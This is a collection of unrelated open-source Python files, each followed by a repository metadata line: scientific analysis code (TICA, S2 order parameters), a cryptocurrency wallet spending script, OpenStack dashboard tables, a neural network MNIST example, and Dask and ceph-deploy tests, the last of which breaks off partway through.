J. Chem. Theory. Comput. doi:10.1021/acs.jctc.5b00553
.. [5] Noe, F., Banisch, R., Clementi, C. 2016. Commute maps: separating slowly-mixing molecular configurations
for kinetic modeling. J. Chem. Theory. Comput. doi:10.1021/acs.jctc.6b00762
"""
super(TICA, self).__init__()
if kinetic_map and commute_map:
raise ValueError('Trying to use both kinetic_map and commute_map. Use either or.')
if (kinetic_map or commute_map) and not reversible:
kinetic_map = False
commute_map = False
warnings.warn("Cannot use kinetic_map or commute_map for non-reversible processes, both will be set to"
"False.")
# this instance will be set by partial fit.
self._covar = None
self.dim = dim
self.var_cutoff = var_cutoff
self.set_params(lag=lag, dim=dim, var_cutoff=var_cutoff, kinetic_map=kinetic_map, commute_map=commute_map,
epsilon=epsilon, reversible=reversible, stride=stride, skip=skip, weights=weights, ncov_max=ncov_max)
@property
def model(self):
if not hasattr(self, '_model') or self._model is None:
self._model = TICAModelBase()
return self._model
def describe(self):
try:
dim = self.dimension()
except RuntimeError:
dim = self.dim
return "[TICA, lag = %i; max. output dim. = %i]" % (self._lag, dim)
def estimate(self, X, **kwargs):
r"""
Chunk-based parameterization of TICA. Iterates over all data and estimates
the mean, covariance and time lagged covariance. Finally, the
generalized eigenvalue problem is solved to determine
the independent components.
"""
return super(TICA, self).estimate(X, **kwargs)
def partial_fit(self, X):
""" incrementally update the covariances and mean.
Parameters
----------
X: array, list of arrays, PyEMMA reader
input data.
Notes
-----
The projection matrix is first being calculated upon its first access.
"""
from pyemma.coordinates import source
iterable = source(X, chunksize=self.chunksize)
indim = iterable.dimension()
if not self.dim <= indim:
raise RuntimeError("requested more output dimensions (%i) than dimension"
" of input data (%i)" % (self.dim, indim))
if self._covar is None:
self._covar = LaggedCovariance(c00=True, c0t=True, ctt=False, remove_data_mean=True, reversible=self.reversible,
lag=self.lag, bessel=False, stride=self.stride, skip=self.skip,
weights=self.weights, ncov_max=self.ncov_max)
self._covar.partial_fit(iterable)
self.model.update_model_params(mean=self._covar.mean, # TODO: inefficient, fixme
cov=self._covar.C00_,
cov_tau=self._covar.C0t_)
self._estimated = False
return self
def _estimate(self, iterable, **kw):
covar = LaggedCovariance(c00=True, c0t=True, ctt=False, remove_data_mean=True, reversible=self.reversible,
lag=self.lag, bessel=False, stride=self.stride, skip=self.skip,
weights=self.weights, ncov_max=self.ncov_max)
indim = iterable.dimension()
if not self.dim <= indim:
raise RuntimeError("requested more output dimensions (%i) than dimension"
" of input data (%i)" % (self.dim, indim))
if self._logger_is_active(self._loglevel_DEBUG):
self.logger.debug("Running TICA with tau=%i; Estimating two covariance matrices"
" with dimension (%i, %i)", self._lag, indim, indim)
covar.estimate(iterable, chunksize=self.chunksize, **kw)
self.model.update_model_params(mean=covar.mean,
cov=covar.C00_,
cov_tau=covar.C0t_)
self._diagonalize()
return self.model
def _diagonalize(self):
# diagonalize with low rank approximation
self.logger.debug("diagonalize Cov and Cov_tau.")
try:
eigenvalues, eigenvectors = eig_corr(self.cov, self.cov_tau, self.epsilon, sign_maxelement=True)
except ZeroRankError:
raise ZeroRankError('All input features are constant in all time steps. No dimension would be left after dimension reduction.')
if self.kinetic_map and self.commute_map:
raise ValueError('Trying to use both kinetic_map and commute_map. Use either or.')
if self.kinetic_map: # scale by eigenvalues
eigenvectors *= eigenvalues[None, :]
if self.commute_map: # scale by (regularized) timescales
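            # implied timescale of process i: t_i = -lag / ln|lambda_i|  (|lambda_i| < 1)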
            timescales = -self.lag / np.log(np.abs(eigenvalues))
# dampen timescales smaller than the lag time, as in section 2.5 of ref. [5]
regularized_timescales = 0.5 * timescales * np.maximum(np.tanh(np.pi * ((timescales - self.lag) / self.lag) + 1), 0)
eigenvectors *= np.sqrt(regularized_timescales / 2)
self.logger.debug("finished diagonalisation.")
# compute cumulative variance
cumvar = np.cumsum(np.abs(eigenvalues) ** 2)
cumvar /= cumvar[-1]
self.model.update_model_params(cumvar=cumvar,
eigenvalues=eigenvalues,
eigenvectors=eigenvectors)
self._estimated = True
| markovmodel/PyEMMA | pyemma/coordinates/transform/tica.py | Python | lgpl-3.0 | 11,423 | 0.004465 |
#!/usr/bin/env python
#
# Use the raw transactions API to spend bitcoins received on particular addresses,
# and send any change back to that same address.
#
# Example usage:
# spendfrom.py # Lists available funds
# spendfrom.py --from=ADDRESS --to=ADDRESS --amount=11.00
#
# Assumes it will talk to a bitcoind or Bitcoin-Qt running
# on localhost.
#
# Depends on jsonrpc
#
from decimal import *
import getpass
import math
import os
import os.path
import platform
import sys
import time
from jsonrpc import ServiceProxy, json
BASE_FEE=Decimal("0.001")
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def determine_db_dir():
"""Return the default location of the bitcoin data directory"""
if platform.system() == "Darwin":
return os.path.expanduser("~/Library/Application Support/Bitcoin/")
elif platform.system() == "Windows":
return os.path.join(os.environ['APPDATA'], "Bitcoin")
return os.path.expanduser("~/.bitcoin")
def read_bitcoin_config(dbdir):
"""Read the bitcoin.conf file from dbdir, returns dictionary of settings"""
from ConfigParser import SafeConfigParser
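    # bitcoin.conf has no [section] headers, but ConfigParser requires one;
    # FakeSecHead injects a dummy "[all]" section and strips inline comments.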
class FakeSecHead(object):
def __init__(self, fp):
self.fp = fp
self.sechead = '[all]\n'
def readline(self):
if self.sechead:
try: return self.sechead
finally: self.sechead = None
else:
s = self.fp.readline()
if s.find('#') != -1:
s = s[0:s.find('#')].strip() +"\n"
return s
config_parser = SafeConfigParser()
config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, "bitcoin.conf"))))
return dict(config_parser.items("all"))
def connect_JSON(config):
"""Connect to a bitcoin JSON-RPC server"""
testnet = config.get('testnet', '0')
testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False
if not 'rpcport' in config:
config['rpcport'] = 19230 if testnet else 9230
connect = "http://%s:%s@127.0.0.1:%s"%(config['rpcuser'], config['rpcpassword'], config['rpcport'])
try:
result = ServiceProxy(connect)
# ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,
# but also make sure the bitcoind we're talking to is/isn't testnet:
if result.getmininginfo()['testnet'] != testnet:
sys.stderr.write("RPC server at "+connect+" testnet setting mismatch\n")
sys.exit(1)
return result
except:
sys.stderr.write("Error connecting to RPC server at "+connect+"\n")
sys.exit(1)
def unlock_wallet(bitcoind):
info = bitcoind.getinfo()
if 'unlocked_until' not in info:
return True # wallet is not encrypted
t = int(info['unlocked_until'])
if t <= time.time():
try:
passphrase = getpass.getpass("Wallet is locked; enter passphrase: ")
bitcoind.walletpassphrase(passphrase, 5)
except:
sys.stderr.write("Wrong passphrase\n")
info = bitcoind.getinfo()
return int(info['unlocked_until']) > time.time()
def list_available(bitcoind):
address_summary = dict()
address_to_account = dict()
for info in bitcoind.listreceivedbyaddress(0):
address_to_account[info["address"]] = info["account"]
unspent = bitcoind.listunspent(0)
for output in unspent:
# listunspent doesn't give addresses, so:
rawtx = bitcoind.getrawtransaction(output['txid'], 1)
vout = rawtx["vout"][output['vout']]
pk = vout["scriptPubKey"]
# This code only deals with ordinary pay-to-bitcoin-address
# or pay-to-script-hash outputs right now; anything exotic is ignored.
if pk["type"] != "pubkeyhash" and pk["type"] != "scripthash":
continue
address = pk["addresses"][0]
if address in address_summary:
address_summary[address]["total"] += vout["value"]
address_summary[address]["outputs"].append(output)
else:
address_summary[address] = {
"total" : vout["value"],
"outputs" : [output],
"account" : address_to_account.get(address, "")
}
return address_summary
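# Shape of the returned summary (derived from the code above):
#   { address: {"total": Decimal, "outputs": [unspent txouts], "account": name-or-""} }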
def select_coins(needed, inputs):
# Feel free to improve this, this is good enough for my simple needs:
outputs = []
have = Decimal("0.0")
n = 0
while have < needed and n < len(inputs):
outputs.append({ "txid":inputs[n]["txid"], "vout":inputs[n]["vout"]})
have += inputs[n]["amount"]
n += 1
return (outputs, have-needed)
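# Worked example of the greedy selection above: needing 1.5 BTC with inputs of
# 1.0, 0.4 and 0.3 BTC picks all three in order and returns change of 0.2 BTC.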
def create_tx(bitcoind, fromaddresses, toaddress, amount, fee):
all_coins = list_available(bitcoind)
total_available = Decimal("0.0")
needed = amount+fee
potential_inputs = []
for addr in fromaddresses:
if addr not in all_coins:
continue
potential_inputs.extend(all_coins[addr]["outputs"])
total_available += all_coins[addr]["total"]
if total_available < needed:
sys.stderr.write("Error, only %f BTC available, need %f\n"%(total_available, needed));
sys.exit(1)
#
# Note:
# Python's json/jsonrpc modules have inconsistent support for Decimal numbers.
# Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode
# Decimals, I'm casting amounts to float before sending them to bitcoind.
#
outputs = { toaddress : float(amount) }
(inputs, change_amount) = select_coins(needed, potential_inputs)
if change_amount > BASE_FEE: # don't bother with zero or tiny change
change_address = fromaddresses[-1]
if change_address in outputs:
outputs[change_address] += float(change_amount)
else:
outputs[change_address] = float(change_amount)
rawtx = bitcoind.createrawtransaction(inputs, outputs)
signed_rawtx = bitcoind.signrawtransaction(rawtx)
if not signed_rawtx["complete"]:
sys.stderr.write("signrawtransaction failed\n")
sys.exit(1)
txdata = signed_rawtx["hex"]
return txdata
def compute_amount_in(bitcoind, txinfo):
result = Decimal("0.0")
for vin in txinfo['vin']:
in_info = bitcoind.getrawtransaction(vin['txid'], 1)
vout = in_info['vout'][vin['vout']]
result = result + vout['value']
return result
def compute_amount_out(txinfo):
result = Decimal("0.0")
for vout in txinfo['vout']:
result = result + vout['value']
return result
def sanity_test_fee(bitcoind, txdata_hex, max_fee):
class FeeError(RuntimeError):
pass
try:
txinfo = bitcoind.decoderawtransaction(txdata_hex)
total_in = compute_amount_in(bitcoind, txinfo)
total_out = compute_amount_out(txinfo)
        fee = total_in - total_out
        if fee > max_fee:
            raise FeeError("Rejecting transaction, unreasonable fee of "+str(fee))
tx_size = len(txdata_hex)/2
kb = tx_size/1000 # integer division rounds down
if kb > 1 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee transaction, larger than 1000 bytes")
if total_in < 0.01 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee, tiny-amount transaction")
# Exercise for the reader: compute transaction priority, and
# warn if this is a very-low-priority transaction
except FeeError as err:
sys.stderr.write((str(err)+"\n"))
sys.exit(1)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--from", dest="fromaddresses", default=None,
help="addresses to get bitcoins from")
parser.add_option("--to", dest="to", default=None,
help="address to get send bitcoins to")
parser.add_option("--amount", dest="amount", default=None,
help="amount to send")
parser.add_option("--fee", dest="fee", default="0.0",
help="fee to include")
parser.add_option("--datadir", dest="datadir", default=determine_db_dir(),
help="location of bitcoin.conf file with RPC username/password (default: %default)")
parser.add_option("--testnet", dest="testnet", default=False, action="store_true",
help="Use the test network")
parser.add_option("--dry_run", dest="dry_run", default=False, action="store_true",
help="Don't broadcast the transaction, just create and print the transaction data")
(options, args) = parser.parse_args()
check_json_precision()
config = read_bitcoin_config(options.datadir)
if options.testnet: config['testnet'] = True
bitcoind = connect_JSON(config)
if options.amount is None:
address_summary = list_available(bitcoind)
for address,info in address_summary.iteritems():
n_transactions = len(info['outputs'])
if n_transactions > 1:
print("%s %.8f %s (%d transactions)"%(address, info['total'], info['account'], n_transactions))
else:
print("%s %.8f %s"%(address, info['total'], info['account']))
else:
fee = Decimal(options.fee)
amount = Decimal(options.amount)
while unlock_wallet(bitcoind) == False:
pass # Keep asking for passphrase until they get it right
txdata = create_tx(bitcoind, options.fromaddresses.split(","), options.to, amount, fee)
sanity_test_fee(bitcoind, txdata, amount*Decimal("0.01"))
if options.dry_run:
print(txdata)
else:
txid = bitcoind.sendrawtransaction(txdata)
print(txid)
if __name__ == '__main__':
main()
| DavidSantamaria/Om | contrib/spendfrom/spendfrom.py | Python | mit | 10,053 | 0.005968 |
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.core.urlresolvers import reverse
from django.template import defaultfilters
from django.utils.translation import ugettext_lazy as _
from horizon import tables
from openstack_dashboard import api
from openstack_dashboard.dashboards.identity.groups import constants
LOG = logging.getLogger(__name__)
LOGOUT_URL = 'logout'
STATUS_CHOICES = (
("true", True),
("false", False)
)
class CreateGroupLink(tables.LinkAction):
name = "create"
verbose_name = _("Create Group")
url = constants.GROUPS_CREATE_URL
classes = ("ajax-modal",)
icon = "plus"
policy_rules = (("identity", "identity:create_group"),)
def allowed(self, request, group):
return api.keystone.keystone_can_edit_group()
class EditGroupLink(tables.LinkAction):
name = "edit"
verbose_name = _("Edit Group")
url = constants.GROUPS_UPDATE_URL
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("identity", "identity:update_group"),)
def allowed(self, request, group):
return api.keystone.keystone_can_edit_group()
class DeleteGroupsAction(tables.DeleteAction):
name = "delete"
data_type_singular = _("Group")
data_type_plural = _("Groups")
policy_rules = (("identity", "identity:delete_group"),)
def allowed(self, request, datum):
return api.keystone.keystone_can_edit_group()
def delete(self, request, obj_id):
LOG.info('Deleting group "%s".' % obj_id)
api.keystone.group_delete(request, obj_id)
class ManageUsersLink(tables.LinkAction):
name = "users"
verbose_name = _("Modify Users")
url = constants.GROUPS_MANAGE_URL
icon = "pencil"
policy_rules = (("identity", "identity:get_group"),
("identity", "identity:list_users"),)
def allowed(self, request, datum):
return api.keystone.keystone_can_edit_group()
class GroupFilterAction(tables.FilterAction):
def filter(self, table, groups, filter_string):
"""Naive case-insensitive search."""
q = filter_string.lower()
def comp(group):
if q in group.name.lower():
return True
return False
return filter(comp, groups)
class GroupsTable(tables.DataTable):
name = tables.Column('name', verbose_name=_('Name'))
description = tables.Column(lambda obj: getattr(obj, 'description', None),
verbose_name=_('Description'))
id = tables.Column('id', verbose_name=_('Group ID'))
class Meta:
name = "groups"
verbose_name = _("Groups")
row_actions = (ManageUsersLink, EditGroupLink, DeleteGroupsAction)
table_actions = (GroupFilterAction, CreateGroupLink,
DeleteGroupsAction)
class UserFilterAction(tables.FilterAction):
def filter(self, table, users, filter_string):
"""Naive case-insensitive search."""
q = filter_string.lower()
return [user for user in users
if q in user.name.lower()
or q in getattr(user, 'email', '').lower()]
class RemoveMembers(tables.DeleteAction):
name = "removeGroupMember"
action_present = _("Remove")
action_past = _("Removed")
data_type_singular = _("User")
data_type_plural = _("Users")
policy_rules = (("identity", "identity:remove_user_from_group"),)
def allowed(self, request, user=None):
return api.keystone.keystone_can_edit_group()
def action(self, request, obj_id):
user_obj = self.table.get_object_by_id(obj_id)
group_id = self.table.kwargs['group_id']
LOG.info('Removing user %s from group %s.' % (user_obj.id,
group_id))
api.keystone.remove_group_user(request,
group_id=group_id,
user_id=user_obj.id)
# TODO(lin-hua-cheng): Fix the bug when removing current user
# Keystone revokes the token of the user removed from the group.
# If the logon user was removed, redirect the user to logout.
class AddMembersLink(tables.LinkAction):
name = "add_user_link"
verbose_name = _("Add...")
classes = ("ajax-modal",)
icon = "plus"
url = constants.GROUPS_ADD_MEMBER_URL
policy_rules = (("identity", "identity:list_users"),
("identity", "identity:add_user_to_group"),)
def allowed(self, request, user=None):
return api.keystone.keystone_can_edit_group()
def get_link_url(self, datum=None):
return reverse(self.url, kwargs=self.table.kwargs)
class UsersTable(tables.DataTable):
name = tables.Column('name', verbose_name=_('User Name'))
email = tables.Column('email', verbose_name=_('Email'),
filters=[defaultfilters.escape,
defaultfilters.urlize])
id = tables.Column('id', verbose_name=_('User ID'))
enabled = tables.Column('enabled', verbose_name=_('Enabled'),
status=True,
status_choices=STATUS_CHOICES,
empty_value="False")
class GroupMembersTable(UsersTable):
class Meta:
name = "group_members"
verbose_name = _("Group Members")
table_actions = (UserFilterAction, AddMembersLink, RemoveMembers)
class AddMembers(tables.BatchAction):
name = "addMember"
action_present = _("Add")
action_past = _("Added")
data_type_singular = _("User")
data_type_plural = _("Users")
icon = "plus"
requires_input = True
success_url = constants.GROUPS_MANAGE_URL
policy_rules = (("identity", "identity:add_user_to_group"),)
def allowed(self, request, user=None):
return api.keystone.keystone_can_edit_group()
def action(self, request, obj_id):
user_obj = self.table.get_object_by_id(obj_id)
group_id = self.table.kwargs['group_id']
LOG.info('Adding user %s to group %s.' % (user_obj.id,
group_id))
api.keystone.add_group_user(request,
group_id=group_id,
user_id=user_obj.id)
# TODO(lin-hua-cheng): Fix the bug when adding current user
# Keystone revokes the token of the user added to the group.
# If the logon user was added, redirect the user to logout.
def get_success_url(self, request=None):
group_id = self.table.kwargs.get('group_id', None)
return reverse(self.success_url, args=[group_id])
class GroupNonMembersTable(UsersTable):
class Meta:
name = "group_non_members"
verbose_name = _("Non-Members")
table_actions = (UserFilterAction, AddMembers)
| zouyapeng/horizon-newtouch | openstack_dashboard/dashboards/identity/groups/tables.py | Python | apache-2.0 | 7,450 | 0 |
#!/usr/bin/env python
# This is a demonstration of how to compute S2 order parameters from bond vector correlation functions.
# The S2 estimation is done with the method described in:
# Trbovic et al. Proteins (2008). doi:10.1002/prot.21750
from __future__ import print_function, division
import sys, os, glob
import MOPS as mops
import matplotlib.pyplot as plt
# the correlation functions are stored in a subfolder of the current working directory
# after running test_corr.py
corrpath = "./MOPS_test_corr_fit"
if not os.path.isdir(corrpath):
print("No correlation functions found.")
print("Please run test_corr_fit.py first.")
sys.exit(1)
# load correlation functions
corrFilenames = glob.glob(corrpath + '/*.zip')
op = mops.OrderParameter(corrfilenames=corrFilenames)
# predict order parameters, take only converged correlation functions into account
op.estimate("mean", converged=True)
# extract information
S2 = op.S2mean
S2_std = op.S2std
S2_err = op.S2error # = S2.std / <number subtrajectories>
avgcorr = op.avgcorr # correlation function object with averaged correlation functions over all subtrajectories
corr = avgcorr.corr # numerical correlation functions, array of shape = (nresidues, timeframes)
corrlist = op.corrlist # list of correlation functions per subtrajectory
resids = op.avgcorr.resid[0] # residue ID of the first residue of the bond vector
residx = op.avgcorr.resid[0] # residue index (0-based)
resnames = op.avgcorr.resname[0] # residue name
atomnames = op.avgcorr.atomname[0] # atom name
plt.bar(resids, S2, yerr=S2_std)
plt.ylim(0,1)
plt.xlabel('Residue Number')
plt.ylabel(r'S$^2$')
plt.show()
| schilli/MOPS | MOPS/demo/demo_mean.py | Python | gpl-3.0 | 1,694 | 0.013577 |
from optparse import OptionParser
from application.database import global_db
from application.setup import create_app, setup_database, register_blueprints, load_cluster_config
from core.job.models import Job
from core.monitoring.models import JobPerformance
from core.tag.models import JobTag, Tag
from modules.autotag.models import AutoTag
def run(config: str):
app = create_app(config)
load_cluster_config("cluster_config/", app)
app.logger.info("loading db")
setup_database(app, False)
app.logger.info("loading blueprints")
register_blueprints(app)
return app
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-c", "--config", dest="config", default="dev", help="[dev]elopment or [prod]uction configuration")
parser.add_option("-t", "--t_end", dest="t_end", default=1483025545, help="include tasks completed after [t_end] timestamp")
(options, args) = parser.parse_args()
app = run(options.config)
@app.before_first_request
def tagit():
print("starting tagging")
conditions = []
for autotag in AutoTag.query.all():
conditions.append((autotag.compile_condition(), Tag.query.get(autotag.fk_tag_id).label))
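        # conditions: list of (predicate(job, perf) -> bool, tag label) pairs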
query = global_db.session \
.query(Job, JobPerformance, JobTag) \
.filter(Job.t_end > options.t_end) \
.join(JobPerformance)\
.join(JobTag)
for job,perf,job_tag in query.all():
tags = ""
for condition, label in conditions:
try:
if condition(job, perf):
tags += ";{0}".format(label)
except:
pass
print("{0},{1}".format(job.id, tags))
app.run(host=app.config.get("HOST", "localhost"), port=app.config.get("PORT", 5000) + 10, use_reloader=False)
| srcc-msu/job_statistics | tagit.py | Python | mit | 1,689 | 0.03138 |
import theano
import numpy as np
from sklearn.preprocessing import OneHotEncoder
from sklearn import cross_validation, metrics, datasets
from neupy import algorithms, layers, environment
environment.reproducible()
theano.config.floatX = 'float32'
mnist = datasets.fetch_mldata('MNIST original')
target_scaler = OneHotEncoder()
target = mnist.target.reshape((-1, 1))
target = target_scaler.fit_transform(target).todense()
data = mnist.data / 255.
data = data - data.mean(axis=0)
n_samples = data.shape[0]
data = data.reshape((n_samples, 1, 28, 28))
x_train, x_test, y_train, y_test = cross_validation.train_test_split(
data.astype(np.float32),
target.astype(np.float32),
train_size=(6 / 7.)
)
network = algorithms.Adadelta(
[
layers.Convolution((32, 1, 3, 3)),
layers.Relu(),
layers.Convolution((48, 32, 3, 3)),
layers.Relu(),
layers.MaxPooling((2, 2)),
layers.Dropout(0.2),
layers.Reshape(),
layers.Relu(48 * 12 * 12),
layers.Dropout(0.3),
layers.Softmax(200),
layers.ArgmaxOutput(10),
],
error='categorical_crossentropy',
step=1.0,
verbose=True,
shuffle_data=True,
epochs_step_minimizator=8,
addons=[algorithms.SimpleStepMinimization],
)
network.architecture()
network.train(x_train, y_train, x_test, y_test, epochs=6)
y_predicted = network.predict(x_test)
y_test_labels = np.asarray(y_test.argmax(axis=1)).reshape(len(y_test))
print(metrics.classification_report(y_test_labels, y_predicted))
score = metrics.accuracy_score(y_test_labels, y_predicted)
print("Validation accuracy: {:.2f}%".format(100 * score))
| stczhc/neupy | examples/gd/mnist_cnn.py | Python | mit | 1,657 | 0 |
from ceph_deploy.hosts.alt.install import map_components, NON_SPLIT_PACKAGES
class TestALTMapComponents(object):
def test_valid(self):
pkgs = map_components(NON_SPLIT_PACKAGES, ['ceph-osd', 'ceph-common', 'ceph-radosgw'])
assert 'ceph' in pkgs
assert 'ceph-common' in pkgs
assert 'ceph-radosgw' in pkgs
assert 'ceph-osd' not in pkgs
| ceph/ceph-deploy | ceph_deploy/tests/unit/hosts/test_altlinux.py | Python | mit | 379 | 0.002639 |
import asyncio
from functools import partial
import gc
import subprocess
import sys
from time import sleep
from threading import Lock
import unittest
import weakref
from distutils.version import LooseVersion
from tornado.ioloop import IOLoop
import tornado
from tornado.httpclient import AsyncHTTPClient
import pytest
from dask.system import CPU_COUNT
from distributed import Client, Worker, Nanny, get_client
from distributed.deploy.local import LocalCluster, nprocesses_nthreads
from distributed.metrics import time
from distributed.system import MEMORY_LIMIT
from distributed.utils_test import ( # noqa: F401
clean,
cleanup,
inc,
gen_test,
slowinc,
assert_cannot_connect,
assert_can_connect_locally_4,
assert_can_connect_from_everywhere_4,
assert_can_connect_from_everywhere_4_6,
captured_logger,
tls_only_security,
)
from distributed.utils_test import loop # noqa: F401
from distributed.utils import sync, TimeoutError
from distributed.deploy.utils_test import ClusterTest
def test_simple(loop):
with LocalCluster(
4,
scheduler_port=0,
processes=False,
silence_logs=False,
dashboard_address=None,
loop=loop,
) as c:
with Client(c) as e:
x = e.submit(inc, 1)
x.result()
assert x.key in c.scheduler.tasks
assert any(w.data == {x.key: 2} for w in c.workers.values())
assert e.loop is c.loop
def test_local_cluster_supports_blocked_handlers(loop):
with LocalCluster(blocked_handlers=["run_function"], n_workers=0, loop=loop) as c:
with Client(c) as client:
with pytest.raises(ValueError) as exc:
client.run_on_scheduler(lambda x: x, 42)
assert "'run_function' handler has been explicitly disallowed in Scheduler" in str(
exc.value
)
def test_close_twice():
with LocalCluster() as cluster:
with Client(cluster.scheduler_address) as client:
f = client.map(inc, range(100))
client.gather(f)
with captured_logger("tornado.application") as log:
cluster.close()
cluster.close()
sleep(0.5)
log = log.getvalue()
assert not log
def test_procs():
with LocalCluster(
2,
scheduler_port=0,
processes=False,
threads_per_worker=3,
dashboard_address=None,
silence_logs=False,
) as c:
assert len(c.workers) == 2
assert all(isinstance(w, Worker) for w in c.workers.values())
with Client(c.scheduler.address) as e:
assert all(w.nthreads == 3 for w in c.workers.values())
assert all(isinstance(w, Worker) for w in c.workers.values())
repr(c)
with LocalCluster(
2,
scheduler_port=0,
processes=True,
threads_per_worker=3,
dashboard_address=None,
silence_logs=False,
) as c:
assert len(c.workers) == 2
assert all(isinstance(w, Nanny) for w in c.workers.values())
with Client(c.scheduler.address) as e:
assert all(v == 3 for v in e.nthreads().values())
c.scale(3)
assert all(isinstance(w, Nanny) for w in c.workers.values())
repr(c)
def test_move_unserializable_data():
"""
Test that unserializable data is still fine to transfer over inproc
transports.
"""
with LocalCluster(
processes=False, silence_logs=False, dashboard_address=None
) as cluster:
assert cluster.scheduler_address.startswith("inproc://")
assert cluster.workers[0].address.startswith("inproc://")
with Client(cluster) as client:
lock = Lock()
x = client.scatter(lock)
y = client.submit(lambda x: x, x)
assert y.result() is lock
def test_transports_inproc():
"""
Test the transport chosen by LocalCluster depending on arguments.
"""
with LocalCluster(
1, processes=False, silence_logs=False, dashboard_address=None
) as c:
assert c.scheduler_address.startswith("inproc://")
assert c.workers[0].address.startswith("inproc://")
with Client(c.scheduler.address) as e:
assert e.submit(inc, 4).result() == 5
def test_transports_tcp():
# Have nannies => need TCP
with LocalCluster(
1, processes=True, silence_logs=False, dashboard_address=None
) as c:
assert c.scheduler_address.startswith("tcp://")
assert c.workers[0].address.startswith("tcp://")
with Client(c.scheduler.address) as e:
assert e.submit(inc, 4).result() == 5
def test_transports_tcp_port():
# Scheduler port specified => need TCP
with LocalCluster(
1,
processes=False,
scheduler_port=8786,
silence_logs=False,
dashboard_address=None,
) as c:
assert c.scheduler_address == "tcp://127.0.0.1:8786"
assert c.workers[0].address.startswith("tcp://")
with Client(c.scheduler.address) as e:
assert e.submit(inc, 4).result() == 5
class LocalTest(ClusterTest, unittest.TestCase):
Cluster = partial(LocalCluster, silence_logs=False, dashboard_address=None)
kwargs = {"dashboard_address": None, "processes": False}
def test_Client_with_local(loop):
with LocalCluster(
1, scheduler_port=0, silence_logs=False, dashboard_address=None, loop=loop
) as c:
with Client(c) as e:
assert len(e.nthreads()) == len(c.workers)
assert c.scheduler_address in repr(c)
def test_Client_solo(loop):
with Client(loop=loop, silence_logs=False) as c:
pass
assert c.cluster.status == "closed"
@gen_test()
async def test_duplicate_clients():
pytest.importorskip("bokeh")
c1 = await Client(
processes=False, silence_logs=False, dashboard_address=9876, asynchronous=True
)
with pytest.warns(Warning) as info:
c2 = await Client(
processes=False,
silence_logs=False,
dashboard_address=9876,
asynchronous=True,
)
assert "dashboard" in c1.cluster.scheduler.services
assert "dashboard" in c2.cluster.scheduler.services
assert any(
all(
word in str(msg.message).lower()
for word in ["9876", "running", "already in use"]
)
for msg in info.list
)
await c1.close()
await c2.close()
def test_Client_kwargs(loop):
with Client(loop=loop, processes=False, n_workers=2, silence_logs=False) as c:
assert len(c.cluster.workers) == 2
assert all(isinstance(w, Worker) for w in c.cluster.workers.values())
assert c.cluster.status == "closed"
def test_Client_unused_kwargs_with_cluster(loop):
with LocalCluster() as cluster:
with pytest.raises(Exception) as argexcept:
c = Client(cluster, n_workers=2, dashboard_port=8000, silence_logs=None)
assert (
str(argexcept.value)
== "Unexpected keyword arguments: ['dashboard_port', 'n_workers', 'silence_logs']"
)
def test_Client_unused_kwargs_with_address(loop):
with pytest.raises(Exception) as argexcept:
c = Client(
"127.0.0.1:8786", n_workers=2, dashboard_port=8000, silence_logs=None
)
assert (
str(argexcept.value)
== "Unexpected keyword arguments: ['dashboard_port', 'n_workers', 'silence_logs']"
)
def test_Client_twice(loop):
with Client(loop=loop, silence_logs=False, dashboard_address=None) as c:
with Client(loop=loop, silence_logs=False, dashboard_address=None) as f:
assert c.cluster.scheduler.port != f.cluster.scheduler.port
@pytest.mark.asyncio
async def test_client_constructor_with_temporary_security(cleanup):
pytest.importorskip("cryptography")
async with Client(
security=True, silence_logs=False, dashboard_address=None, asynchronous=True
) as c:
assert c.cluster.scheduler_address.startswith("tls")
assert c.security == c.cluster.security
@pytest.mark.asyncio
async def test_defaults(cleanup):
async with LocalCluster(
scheduler_port=0, silence_logs=False, dashboard_address=None, asynchronous=True
) as c:
assert sum(w.nthreads for w in c.workers.values()) == CPU_COUNT
assert all(isinstance(w, Nanny) for w in c.workers.values())
@pytest.mark.asyncio
async def test_defaults_2(cleanup):
async with LocalCluster(
processes=False,
scheduler_port=0,
silence_logs=False,
dashboard_address=None,
asynchronous=True,
) as c:
assert sum(w.nthreads for w in c.workers.values()) == CPU_COUNT
assert all(isinstance(w, Worker) for w in c.workers.values())
assert len(c.workers) == 1
@pytest.mark.asyncio
async def test_defaults_3(cleanup):
async with LocalCluster(
n_workers=2,
scheduler_port=0,
silence_logs=False,
dashboard_address=None,
asynchronous=True,
) as c:
if CPU_COUNT % 2 == 0:
expected_total_threads = max(2, CPU_COUNT)
else:
# n_workers not a divisor of _nthreads => threads are overcommitted
expected_total_threads = max(2, CPU_COUNT + 1)
assert sum(w.nthreads for w in c.workers.values()) == expected_total_threads
@pytest.mark.asyncio
async def test_defaults_4(cleanup):
async with LocalCluster(
threads_per_worker=CPU_COUNT * 2,
scheduler_port=0,
silence_logs=False,
dashboard_address=None,
asynchronous=True,
) as c:
assert len(c.workers) == 1
@pytest.mark.asyncio
async def test_defaults_5(cleanup):
async with LocalCluster(
n_workers=CPU_COUNT * 2,
scheduler_port=0,
silence_logs=False,
dashboard_address=None,
asynchronous=True,
) as c:
assert all(w.nthreads == 1 for w in c.workers.values())
@pytest.mark.asyncio
async def test_defaults_6(cleanup):
async with LocalCluster(
threads_per_worker=2,
n_workers=3,
scheduler_port=0,
silence_logs=False,
dashboard_address=None,
asynchronous=True,
) as c:
assert len(c.workers) == 3
assert all(w.nthreads == 2 for w in c.workers.values())
@pytest.mark.asyncio
async def test_worker_params(cleanup):
async with LocalCluster(
